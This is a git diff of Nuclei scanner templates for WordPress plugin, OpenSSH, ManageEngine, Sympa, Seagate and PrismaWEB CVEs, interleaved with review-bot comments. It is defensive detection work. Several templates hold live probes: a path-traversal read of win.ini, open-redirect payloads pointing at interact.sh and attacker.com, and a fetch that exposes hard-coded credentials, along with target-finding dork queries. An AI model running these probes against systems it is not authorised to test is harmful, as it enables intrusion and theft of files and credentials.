extractors: + - type: regex + part: header + group: 1 + regex: + # Match Jenkins versions up to 2.470 or LTS 2.452.3 + - "X-Jenkins: ((2\\.([0-3]?\\d{1,2}|4[0-6]?\\d{0,1}|470))(\\.[0-9]+)?|([0-1]?\\d{1,2})(\\.[0-9]+)?|2\\.452\\.([0-2]|3))" diff --git a/poc/cve/CVE-2024-6409.yaml b/poc/cve/CVE-2024-6409.yaml new file mode 100644 index 0000000000..209a63a2ca --- /dev/null +++ b/poc/cve/CVE-2024-6409.yaml 
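Review bot: The version regex sits only under `extractors`, so it never gates the result; the `matchers` are `status 200` plus an `X-Jenkins:` header, which every Jenkins instance satisfies, and the template reports high severity regardless of version. The regex is also unanchored on the right: the first alternative `2\\.([0-3]?\\d{1,2}|...)` matches the prefix `2.47` of `2.471` and `2.45` of `2.452.4`, so even as a matcher it would accept patched releases. Move the pattern into a `type: regex` matcher under the `and` condition and terminate it with `(\\r|\\n|$)`, keeping the existing `# Match Jenkins versions up to 2.470 or LTS 2.452.3` comment on it. `name: CVE-2024-43044` should be a title, and `classification` should carry the `cve-id`.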
@@ -0,0 +1,32 @@ +id: CVE-2024-6409 + +info: + name: CVE-2024-6409 + author: Redflare Cyber + severity: high + description: Race Condition in OpenSSH versions 8.7 and 8.8, allows for potential remote code execution (RCE) due to a race condition in signal handling within the privilege separation (privsep) child process. + classification: + cve-id: CVE-2024-6409 + metadata: + max-request: 2 + vendor: OpenSSH + shodan: product:"OpenSSH" version:"8.7p1,8.8p1" + product: OpenSSH + tags: cve,cve2024,regression,openssh,ssh + +tcp: + - host: + - '{{Hostname}}' + - '{{Host}}:22' + + inputs: + - data: "SSH-2.0-OpenSSH_9.0\r\n" + + matchers: + - type: regex + part: body + regex: + - 'OpenSSH_(8\.7p1|8\.8p1)' + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2024-6482.yaml b/poc/cve/CVE-2024-6482.yaml new file mode 100644 index 0000000000..3e3fc23a42 --- /dev/null +++ b/poc/cve/CVE-2024-6482.yaml 
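Review bot: The `type: status` matcher at the end of the `tcp` block has no meaning for a network template (there is no HTTP status on a raw socket); with no `matchers-condition` the two matchers are OR'd, so it is harmless only by accident and should be removed rather than left as a matcher that can never be satisfied. The banner regex `OpenSSH_(8\.7p1|8\.8p1)` flags every 8.7/8.8 build, including distributions that backport the fix without changing the banner (CVE-2024-6409 was reported against downstream RHEL 9 packages, as I recall), so this is a version indication, not a confirmation; `# banner match only: patched downstream builds keep the same version string` beside the regex would stop a hit being read as proof. `{{Hostname}}` and `{{Host}}:22` resolve to the same socket whenever the input already carries port 22, doubling the requests.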
@@ -0,0 +1,59 @@ +id: CVE-2024-6482 + +info: + name: > + Login with phone number <= 1.7.49 - Authenticated (Subscriber+) Authorization Bypass to Privilege Escalation + author: topscoder + severity: low + description: > + The Login with phone number plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.7.49. This is due to a lack of validation and missing capability check on user-supplied data in the 'lwp_update_password_action' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update their role to any other role, including Administrator. The vulnerability was partially patched in version 1.7.40. The login with phone number pro plugin was required to exploit the vulnerability in versions 1.7.40 - 1.7.49. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/de7cde2c-142c-4004-9302-be335265d87d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-6482 + metadata: + fofa-query: "wp-content/plugins/login-with-phone-number/" + google-query: inurl:"/wp-content/plugins/login-with-phone-number/" + shodan-query: 'vuln:CVE-2024-6482' + tags: cve,wordpress,wp-plugin,login-with-phone-number,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/login-with-phone-number/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "login-with-phone-number" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.49') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-8246.yaml b/poc/cve/CVE-2024-8246.yaml new file mode 100644 index 0000000000..ef152a5c54 --- /dev/null +++ b/poc/cve/CVE-2024-8246.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8246 + +info: + name: > + Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) <= 2.8.11 - Authenticated (Contributor+) Privilege Escalation + author: topscoder + severity: low + description: > + The Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.8.11. This is due to plugin not properly restricting what users have access to set the default role on registration forms. This makes it possible for authenticated attackers, with contributor-level access and above, to create a registration form with a custom role that allows them to register as administrators. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/40760f60-b81a-447b-a2c8-83c7666ce410?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-8246 + metadata: + fofa-query: "wp-content/plugins/buddyforms/" + google-query: inurl:"/wp-content/plugins/buddyforms/" + shodan-query: 'vuln:CVE-2024-8246' + tags: cve,wordpress,wp-plugin,buddyforms,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/buddyforms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "buddyforms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.11') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-8271.yaml b/poc/cve/CVE-2024-8271.yaml new file mode 100644 index 0000000000..3148da9093 --- /dev/null +++ b/poc/cve/CVE-2024-8271.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8271 + +info: + name: > + FOX – Currency Switcher Professional for WooCommerce <= 1.4.2.1 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: high + description: > + The The FOX – Currency Switcher Professional for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.4.2.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode in the 'woocs_get_custom_price_html' function. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dec51bd6-2ffe-47b6-9423-6131395bf439?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-8271 + metadata: + fofa-query: "wp-content/plugins/woocommerce-currency-switcher/" + google-query: inurl:"/wp-content/plugins/woocommerce-currency-switcher/" + shodan-query: 'vuln:CVE-2024-8271' + tags: cve,wordpress,wp-plugin,woocommerce-currency-switcher,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-currency-switcher/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-currency-switcher" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8479.yaml b/poc/cve/CVE-2024-8479.yaml new file mode 100644 index 0000000000..0001735ba3 --- /dev/null 
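Review bot: The description opens with `The The FOX – Currency Switcher…`, a doubled article that will be shown verbatim in scanner output; the same typo appears in CVE-2024-8479's description (`The The Simple Spoiler plugin…`) later in this commit. Presumably the generator prefixes `The ` to a vendor name that already starts with it; `The FOX – Currency Switcher Professional for WooCommerce plugin` is the one-word fix here, and the generator should be corrected at the source. Both files also end without a trailing newline (`\ No newline at end of file`), which the hand-written templates in this commit avoid.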
+++ b/poc/cve/CVE-2024-8479.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8479 + +info: + name: > + Simple Spoiler 1.2 - 1.3 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: high + description: > + The The Simple Spoiler plugin for WordPress is vulnerable to arbitrary shortcode execution in versions 1.2 to 1.3. This is due to the plugin adding the filter add_filter('comment_text', 'do_shortcode'); which will run all shortcodes in comments. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8ffc76d8-b841-4c26-bbc6-1f96664efe36?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-8479 + metadata: + fofa-query: "wp-content/plugins/simple-spoiler/" + google-query: inurl:"/wp-content/plugins/simple-spoiler/" + shodan-query: 'vuln:CVE-2024-8479' + tags: cve,wordpress,wp-plugin,simple-spoiler,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-spoiler/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-spoiler" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 1.2', '<= 1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8669.yaml b/poc/cve/CVE-2024-8669.yaml new file mode 100644 index 0000000000..567d63a88b --- /dev/null +++ b/poc/cve/CVE-2024-8669.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-8669
+
+info:
+ name: >
+ Backuply – Backup, Restore, Migrate and Clone <= 1.3.4 - Authenticated (Admin+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to SQL Injection via the 'options' parameter passed to the backuply_wp_clone_sql() function in all versions up to, and including, 1.3.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6a061553-c988-4a31-a0a2-7a2608faa33f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 9.1
+ cve-id: CVE-2024-8669
+ metadata:
+ fofa-query: "wp-content/plugins/backuply/"
+ google-query: inurl:"/wp-content/plugins/backuply/"
+ shodan-query: 'vuln:CVE-2024-8669'
+ tags: cve,wordpress,wp-plugin,backuply,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/backuply/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "backuply"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8724.yaml b/poc/cve/CVE-2024-8724.yaml
new file mode 100644
index 0000000000..f0d4cf631a
--- /dev/null
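Review bot: `severity: low` (and the trailing `low` in `tags`) disagrees with this template's own `cvss-score: 9.1` and its title, `Authenticated (Admin+) SQL Injection`, so the finding will be triaged differently depending on which field a consumer reads. If `low` is deliberate because the vector needs administrator credentials (the metrics carry `PR:H`), record that next to the field, e.g. `severity: low  # kept low: exploitation requires admin-level access`, otherwise raise `severity` to agree with the score. Either way the word matcher on `backuply` only proves the readme is reachable, so the score should not be read as a confirmed-exploitable result.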
+++ b/poc/cve/CVE-2024-8724.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8724
+
+info:
+ name: >
+ Waitlist Woocommerce ( Back in stock notifier ) <= 2.7.5 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Waitlist Woocommerce ( Back in stock notifier ) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.7.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c298c87e-cf3c-4b72-bb0e-a01ca2dfe52f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8724
+ metadata:
+ fofa-query: "wp-content/plugins/waitlist-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/waitlist-woocommerce/"
+ shodan-query: 'vuln:CVE-2024-8724'
+ tags: cve,wordpress,wp-plugin,waitlist-woocommerce,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/waitlist-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "waitlist-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8797.yaml b/poc/cve/CVE-2024-8797.yaml
new file mode 100644
index 0000000000..f0288d9034
--- /dev/null
+++ b/poc/cve/CVE-2024-8797.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8797
+
+info:
+ name: >
+ WP Booking System – Booking Calendar <= 2.0.19.8 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WP Booking System – Booking Calendar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.19.8. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1bea55b5-b2d7-4eaf-8868-d2645ce18619?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8797
+ metadata:
+ fofa-query: "wp-content/plugins/wp-booking-system/"
+ google-query: inurl:"/wp-content/plugins/wp-booking-system/"
+ shodan-query: 'vuln:CVE-2024-8797'
+ tags: cve,wordpress,wp-plugin,wp-booking-system,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-booking-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-booking-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.19.8')
\ No newline at end of file
diff --git a/poc/cve/cve-2017-11512.yaml b/poc/cve/cve-2017-11512.yaml
index 095801ddf9..8b2924e2e0 100644
--- a/poc/cve/cve-2017-11512.yaml
+++ b/poc/cve/cve-2017-11512.yaml
@@ -6,22 +6,33 @@ info: severity: high description: | ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage. + remediation: | + Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328 or apply the necessary security patches. reference: - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html - https://www.tenable.com/security/research/tra-2017-31 - - https://web.archive.org/web/20210116180015/https://www.securityfocus.com/bid/101789/ - https://nvd.nist.gov/vuln/detail/CVE-2017-11512 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-11512 cwe-id: CWE-22 + epss-score: 0.97175 + epss-percentile: 0.99794 + cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: manageengine + product: servicedesk shodan-query: http.title:"ManageEngine" - verified: "true" tags: cve,cve2017,manageengine,lfr,unauth,tenable -requests: +http: - method: GET path: - '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini' @@ -36,5 +47,4 @@ requests: - "fonts" - "extensions" condition: and - -# Enhanced by mp on 2022/06/09 +# digest: 4a0a00473045022075475b13b0c988c21ece3fd5009fa0ed01ba7fef5c7daffb6579403d0bfdc831022100809a276461fd74d794533eaf19a7d5155c61d32b746d12ac53a958ef2f4dbaf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-1000671.yaml b/poc/cve/cve-2018-1000671.yaml index d6302807a8..009d5c0c00 100644 
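Review bot: The added `remediation` tells the reader to `Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328`, but 9.3.9328 is exactly the build that the `description` and the new `cpe` entry identify as vulnerable, so the sentence points at the affected release. Reword it to a later build without inventing a number, e.g. `Upgrade to a ServiceDesk build later than 9.3.9328 in which CVE-2017-11512 is fixed (see vendor advisory).` The new `metadata.max-request: 2` is asserted while only one `path` entry is visible in the first hunk; the path list continues between the two hunks, so please confirm the count matches what is actually sent.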
--- a/poc/cve/cve-2018-1000671.yaml +++ b/poc/cve/cve-2018-1000671.yaml @@ -5,21 +5,33 @@ info: author: 0x_Akoko severity: medium description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of Sympa (>=6.2.17) or apply the necessary security patches provided by the vendor. reference: - https://github.com/sympa-community/sympa/issues/268 - https://vuldb.com/?id.123670 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671 + - https://lists.debian.org/debian-lts-announce/2018/09/msg00023.html + - https://lists.debian.org/debian-lts-announce/2020/11/msg00015.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-1000671 cwe-id: CWE-601 + epss-score: 0.00598 + epss-percentile: 0.77958 + cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: sympa + product: sympa shodan-query: http.html:"sympa" - verified: "true" tags: cve,cve2018,redirect,sympa,debian -requests: +http: - method: GET path: - '{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email=' 
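Review bot: The new `remediation` (`Upgrade to a patched version of Sympa (>=6.2.17)`) contradicts the unchanged `description`, which states that `Sympa version 6.2.16 and later contains` the flaw; read together they claim 6.2.17 is both affected and fixed. Reconcile both lines against the referenced sympa issue #268 and the two Debian LTS advisories that this hunk adds rather than guessing a boundary. The new `impact` text asserts `session hijacking` and `theft of sensitive information`, which goes beyond the open redirect and data-URI reflected XSS the description documents; I would keep the impact to what the references support.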
@@ -28,6 +40,5 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by mp on 2022/08/18 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a0047304502204e16f5d026a87fbad38aac592766dd6e68435602edbec28fe2e6270fafc0d437022100b08c758a888bb461050d16dce5bf53016a9a5c643a58e4b347f17111f5cb0bf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-12300.yaml b/poc/cve/cve-2018-12300.yaml index aac189bfd8..94384ca163 100644 --- a/poc/cve/cve-2018-12300.yaml +++ b/poc/cve/cve-2018-12300.yaml 
@@ -1,28 +1,39 @@ id: CVE-2018-12300 info: - name: Seagate NAS OS 4.3.15.1 - Open redirect + name: Seagate NAS OS 4.3.15.1 - Open Redirect author: 0x_Akoko severity: medium - description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter. + description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter. + impact: | + Successful exploitation of this vulnerability could lead to user redirection to malicious websites, potentially resulting in the theft of sensitive information or the installation of malware. + remediation: | + Apply the latest security patches or updates provided by Seagate to fix the open redirect vulnerability in NAS OS 4.3.15.1. reference: - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - - https://www.cvedetails.com/cve/CVE-2018-12300 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12300 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2018-12300 cwe-id: CWE-601 - tags: cve,cve2018,redirect,seagate,nasos + epss-score: 0.00118 + epss-percentile: 0.45685 + cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: seagate + product: nas_os + tags: cve2018,cve,redirect,seagate,nasos -requests: +http: - method: GET - path: - - '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#' + - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + 
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a00473045022100b3dfe85d30990abdfc76926f79fc0972052a3bf24374013a6ed622a5fac500f402202ad50a628af7526e0eca73ed3a88133d9c9e4962c830fcc5b7e868563bedb40e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-12675.yaml b/poc/cve/cve-2018-12675.yaml index d1f5d24b6f..52e4353249 100644 --- a/poc/cve/cve-2018-12675.yaml +++ b/poc/cve/cve-2018-12675.yaml 
@@ -6,21 +6,32 @@ info: severity: medium description: | SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can use this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Apply the latest firmware update provided by the vendor to fix the open redirect vulnerability. reference: - https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory - https://vuldb.com/?id.125799 - https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2018-12675 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-12675 cwe-id: CWE-601 + epss-score: 0.00118 + epss-percentile: 0.44971 + cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 1 + vendor: sv3c + product: h.264_poe_ip_camera_firmware tags: cve,cve2018,redirect,sv3c,camera,iot -requests: +http: - method: GET path: - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh' @@ -30,5 +41,4 @@ requests: part: body words: - '' - -# Enhanced by md on 2022/10/13 +# digest: 4a0a00473045022100fe1e9de738122538a2449b660acfbadd5b2f6e95f978b4fd052467bb4f222c1b022077728b007829328b0aa238c9635a5106d04c04ef695ec1557e91b4b5b46cb70f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-9161.yaml b/poc/cve/cve-2018-9161.yaml index 5db121e528..d3295f40cc 100644 --- a/poc/cve/cve-2018-9161.yaml 
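Review bot: The unchanged context at the end of the second hunk shows a body matcher whose only entry is the empty string (`words:` / `- ''`), which matches every response and therefore contributes no evidence of the redirect; this commit reworks the surrounding metadata but leaves it in place. The matcher list begins before the hunk, so a header matcher above it may be what actually checks the `Location` to interact.sh; if so the empty-word matcher should simply be removed, and if not, this template needs the same header check the other open-redirect templates in this commit use, e.g. `- type: regex` / `part: header` / `regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'`.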
+++ b/poc/cve/cve-2018-9161.yaml 
@@ -4,18 +4,31 @@ info: name: PrismaWEB - Credentials Disclosure author: gy741 severity: critical - description: The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. + description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. + impact: | + An attacker could gain unauthorized access to the application and potentially compromise user accounts and sensitive data. + remediation: | + Ensure that sensitive credentials are properly protected and not exposed in the application's source code or configuration files. 
reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php - https://nvd.nist.gov/vuln/detail/CVE-2018-9161 - tags: cve,cve2018,prismaweb,exposure + - https://www.exploit-db.com/exploits/44276/ + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-9161 cwe-id: CWE-798 + epss-score: 0.12574 + epss-percentile: 0.95318 + cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: prismaindustriale + product: checkweigher_prismaweb + tags: cve2018,cve,prismaweb,exposure,edb,prismaindustriale -requests: +http: - method: GET path: - "{{BaseURL}}/user/scripts/login_par.js" @@ -32,3 +45,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100ffcd63af862f8b9aa24f999ad152b190ff12a716891947bdfcdf6f8928420413022006b1c871ad6ce93fb773c74b29e916effe0a6cb129653f58c5c4eb406cccfe6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-10758.yaml b/poc/cve/cve-2019-10758.yaml index 9ce3a78eca..92d6c6e83f 100644 --- a/poc/cve/cve-2019-10758.yaml +++ b/poc/cve/cve-2019-10758.yaml 
